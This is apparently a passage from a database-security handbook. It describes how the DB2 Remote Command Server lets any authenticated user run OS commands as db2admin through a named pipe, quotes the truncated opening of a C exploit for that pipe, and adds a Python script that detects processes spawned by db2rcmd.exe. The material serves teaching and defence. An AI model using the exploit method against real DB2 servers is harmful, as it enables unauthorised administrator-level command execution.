DB2 Remote Command Server

The DB2 Remote Command Server exists to ease administration of the DB2 server by allowing users to run arbitrary commands on the remote server. Although the Remote Command Server was intended to allow administrators to run commands, commands can be run by any user, provided of course they have a user ID and password. While it is considered bad to allow everyone and their dog to run commands remotely, what exacerbates the problem is that the command runs with the privileges of the user account running the Remote Command Server. On Windows, for example, this is db2admin, which is an administrator. What this means is that a low-privileged guest account can run OS commands with administrator-level privileges.

/* DB2 Remote Command Server Exploit

DB2RCMD.EXE listens on a named pipe DB2REMOTECMD and executes commands sent through it. When a connection is made to the pipe a new process is created, namely db2rcmdc.exe, and this executes the command.

*/

#include <stdio.h>
#include <windows.h>

int main(int argc, char *argv[])
{
    char buffer[540] = "";
    char NamedPipe[260] = "\\\\";    // will become \\target\pipe\DB2REMOTECMD
    HANDLE rcmd = NULL;
    char *ptr = NULL;
    int len = 0;
    DWORD Bytes = 0;

    if (argc != 3)
    {
        printf("\n\tDB2 Remote Command Exploit.\n\n");
        printf("\tUsage: db2rmtcmd target \"command\"\n");
        printf("\n\tDavid Litchfield\n\t(david@ngssoftware.com)\n\t6th September 2003\n");
        return 0;
    }

    // Build the UNC path of the named pipe on the target host
    strncat(NamedPipe, argv[1], 200);
    strcat(NamedPipe, "\\pipe\\DB2REMOTECMD");

    // Setup handshake message
    ZeroMemory(buffer, 540);
    ...
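On the defensive side, the process chain described above (db2rcmd.exe spawning db2rcmdc.exe, which in turn runs the submitted command) is a useful detection hook. The following is an added example, not code from the book, that walks constructed Sysmon-style process-creation records (field names ProcessId, ParentProcessId, Image, User, CommandLine are assumed; the paths and PIDs are made up) and reports every process whose ancestry leads back to the Remote Command Server, together with the account it ran under.

```python
from typing import Dict, List

# Constructed sample process-creation records shaped like Sysmon Event ID 1 fields.
# Paths and PIDs are made up; only the image names come from the text above.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ProcessId": "1200", "ParentProcessId": "700", "User": "HOST\\db2admin",
     "Image": "C:\\SQLLIB\\BIN\\db2rcmd.exe", "CommandLine": "db2rcmd.exe"},
    {"ProcessId": "3410", "ParentProcessId": "1200", "User": "HOST\\db2admin",
     "Image": "C:\\SQLLIB\\BIN\\db2rcmdc.exe", "CommandLine": "db2rcmdc.exe"},
    {"ProcessId": "3422", "ParentProcessId": "3410", "User": "HOST\\db2admin",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"ProcessId": "4100", "ParentProcessId": "900", "User": "HOST\\alice",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"},
]


def _basename(image: str) -> str:
    """Lower-cased file name of an image path, tolerant of / or \\ separators."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_rcmd_descendants(events: List[Dict[str, str]],
                          root: str = "db2rcmd.exe",
                          max_depth: int = 8) -> List[Dict[str, str]]:
    """Return every process whose ancestry (within max_depth hops) leads back to
    the Remote Command Server, with the account it ran as.  Keyed on PID for
    brevity; real telemetry needs ProcessGuid or a time window (PIDs are reused)."""
    by_pid = {e["ProcessId"]: e for e in events}
    hits = []
    for event in events:
        if _basename(event["Image"]) == root:
            continue                      # the server itself is not a finding
        current, depth = event, 0
        while depth < max_depth:
            parent = by_pid.get(current["ParentProcessId"])
            if parent is None:
                break                     # parent not present in the data set
            depth += 1
            if _basename(parent["Image"]) == root:
                hits.append({"pid": event["ProcessId"], "image": _basename(event["Image"]),
                             "command": event["CommandLine"], "user": event["User"],
                             "depth": str(depth)})
                break
            current = parent
    return hits


if __name__ == "__main__":
    for hit in find_rcmd_descendants(SAMPLE_EVENTS):
        print(f"[db2rcmd child] {hit['image']} ({hit['command']}) as {hit['user']} depth={hit['depth']}")
```

Anything this reports running as the DB2 service account (db2admin on Windows) is an OS command executed with that account's privileges, which is the exposure the text describes.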

Get The Database Hacker's Handbook: Defending Database Servers now with the O’Reilly learning platform.